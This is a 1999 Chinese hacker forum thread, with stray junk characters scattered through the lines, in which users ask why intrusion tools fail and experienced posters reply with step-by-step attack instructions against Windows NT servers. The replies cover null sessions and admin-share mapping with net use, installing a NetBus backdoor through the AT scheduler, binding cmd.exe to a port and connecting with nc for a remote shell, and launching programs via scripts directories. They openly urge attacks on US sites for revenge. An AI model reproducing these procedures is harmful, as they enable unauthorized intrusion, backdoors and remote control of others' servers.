《版主页黑客工具和文章的几个问题》中提到:4 Z P0 C" q5 o7 o) C- \2 q( t* E$ Z
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
{% \! p+ S! Z> 我的机子MMX166,WIN98,2。5G,32M内存。
+ j8 X: r: v3 P& d' z) a) q+ m, f: K" ]' L2 k+ J, q
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。) p; j/ z' Q* u+ L
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。; _# H! G; z* [$ H
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
; o: M" B7 {4 d7 u$ }net use \\111.111.111.111\ipc$ "" /user:""( R2 A9 D/ ?: F* v/ O/ T
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
8 O( r- d" i6 z5 s% x& bnet view \\111.111.111.1111 U. r J" H4 D9 [# P# s4 N
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:- t7 `) u/ n$ k" L0 G- L
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"; ?5 |/ P# A) b% Q
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改: D& X; A! ^4 t, X9 ]
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
0 \4 n% W) \* D4 ^net use x: \\111.111.111.111\c$
7 t5 p; A2 u% C% |: r* E4 Knet use y: \\111.111.111.111\d$ Z, w% ?( R/ S4 V" ?
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...5 [; q' h+ X0 A- E, R B- H
2、管理目标NT的用户:
3 L! c& V9 A6 }从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
" @( b7 e9 j- j# l+ ]6 _键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
, Z, _. ]) m+ U, _+ H" d3、管理目标NT的服务! x4 b6 Q7 g' s! I* n- Q6 f
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”* R& |6 X& F' F3 c a+ ]# U
这样你可以管理目标NT上的服务,共享目录0 c2 F$ m2 _' | q0 T
4、IIS管理
) v6 j9 l- v- q9 Z选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
. n5 M# n. d5 R目标NT的FTP、WWW服务你就可以重新配置# f1 W6 l1 ]" f* p' s
5、事件管理" E% i4 c9 W$ D4 i8 f
“事件查看器”->连接到服务器->111.111.111.111
) f6 I" D& ? v4 a# p7 a1 ? l2 l/ i% t3 Q8 X5 G
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
* {+ c* r) a- p+ ]) F8 m/ M1 Z8 J' z* J6 |) D+ p
当然,98,95也能做一些事情,但很麻烦,比如:
; J+ |% U/ J- y5 L$ T$ z8 y8 r& p/ [net use \\111.111.111.111\ipc$
/ \. a4 H' o* u5 N4 [; I7 Ynet use z: \\111.111.111.111\d$
m; h( l1 p6 o但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
% b, v; p% q) N3 l- U4 |) d2 H1 A( e2 |) J
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
% u) i8 q0 q& B1 ?0 S" A [这样,你还可以了解目标机器上能有什么东东供你去用!
: A1 |" M0 N( s7 B$ {$ A @1 q0 R% s, k5 C" B% W9 S
* {0 e) Q. x. U4 Y: B$ m- F, L
--------------------------------------------------------------------------------
5 ]* P7 p; Y7 R% H" A& t' T
# V7 R( W5 ?9 m3 o>quack于1999-06-12,23:37:44
S6 }) W0 p9 A' q# m s在大作《几个有关黑的问题》中提到:* N9 H* y# k j' ^8 P) u- q/ N4 l
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。6 I$ H6 u- ?1 `+ [5 f" Y, p
- |. e& _2 H; o% n9 q7 P/ w( ]! F
killusa于1999-06-13,03:25:15
: x* P, s) ?1 W* z( a在大作《Re: 几个有关黑的问题》中提到:8 p; \) h3 D5 I
# S; n Q) w9 C) Q+ o, [
letmein.exe 暂时没有mypwd参数,十分抱歉" O3 u1 S9 F% U
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。5 D* Q+ }9 R; K+ F5 t U
% u2 L: G0 e5 X9 W# e2 k
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的5 ~" A$ Z. _9 O D
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:* r* `8 B$ ]. A% N- m% K$ P
: b0 V! U+ D2 q) E
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:; R( Z5 ~2 _5 w) X
. l W( C6 ]; ~4 `: j
C:\>net start schedule
$ `( O _8 p- b/ u5 Q1 XSchedule 正在启动服务.....8 A# @- u8 m$ N. t% |0 E0 Z
Schedulw 服务启动成功。% e* W8 |8 k/ x; I3 j/ w+ w. k0 ~
C:\>at /?
& ?+ @. f* x! U XAT 命令排定在特定的日期和时间运行某些命令和程序。
; G ~$ E9 N' g) y( l6 x5 j& B! j运行 AT 命令之前必须先启动 Schedule 服务。9 \2 c+ g) ^5 ]% M V8 y
2 |3 h. H: M4 tAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
' @* o* x6 i! G$ n$ \9 T+ hAT [\\computername] time [/INTERACTIVE]
7 S! v; I& P. a; H1 b[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
% {' ]0 u- E- H1 Q- t; ?. w+ f) ]- A/ \8 _& @$ I5 v5 d6 g: E
\\computername 指定远程计算机。 如果省略这个参数+ O3 k! P" @ l& q3 E& O E7 [& s4 G
命令会被排定在本机上运行。
; G' q, I9 N% _* L- ]8 ?- v1 aid 指定给排定进度命令的识别号。3 y( K6 p4 l2 n; H$ j7 J% {8 e; a
! l" M" g8 S8 R9 a
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。8 p/ E2 e; A3 a
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
% ?! ~1 E, U2 a/ f6 Ntime 指定命令运行的时间。% H* o* F% ^4 |' F$ s- k5 B
/interactive 允许作业在运行时,与用户通过桌面交互。+ ?1 I# e. h* }1 u) e* p6 j
8 e2 r' E! |$ a& {/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。. [3 A1 R/ v6 v% h; }) B! n. E; _0 \7 M
如果省略日期,则默认为在每月的本日运行。
" d/ C; p7 s' n1 H8 o7 N
( T- i/ k. d5 J9 P! y' I/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。, u. ~ n0 c2 w1 P# ~
2 r4 D: n* ^+ s$ v1 F& x"command" 准备运行的 Windows NT 命令或批处理文件。2 b8 M, Z* ]2 d( G e
& ~9 Q- g0 }) J8 p" o5 O N* ]+ s
C:\>
( J+ F0 C6 N) ?+ B/ T" k6 P
9 y# [# ~. Z4 [0 r- E$ g7 a/ E知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
+ p: U6 U3 b. q1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
6 q9 b" s0 ?% m, C2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start& B, a2 e* c% w/ U
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
4 q9 c; a5 z Z$ }1 b2 A0 @% e! nat \\x.x.x.x 00:00 ntsrv.exe /port:64321' j) {: @: Y: T! `
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:# o% w+ |6 m+ k, `$ h) n
Microsoft(R) Windows NT(TM)
5 A( u9 X( _% B2 Y(C) Copyright 1985-1996 Microsoft Corp.
2 `7 ?+ r6 q3 O9 W% EC:\>9 b5 @+ z( Z/ K7 f
4 H4 k. u" _* w" W
2、利用web启动ntsrv.exe或其他程序在目的服务器
8 r& [: |4 ?! a( l. k4 E3 A* i6 z1 f Q( S' h) N9 |
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:( e Y, c9 w; I
http://x.x.x.x/scripts/ntsrv.exe /port:64321 m7 g4 D, z; V) a
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
+ _3 e6 w9 D8 [该程序就启动了7 s4 a1 F" w3 S9 @, I i
0 s& G P0 `0 V" e" T
我只提这几中方法!
4 g; D! }- H$ T要成功,必须打好基础工,对操作系统充分了解!
* W0 _: s( p+ k. @2 \* K( O6 S& N' j- [ V6 b0 H
|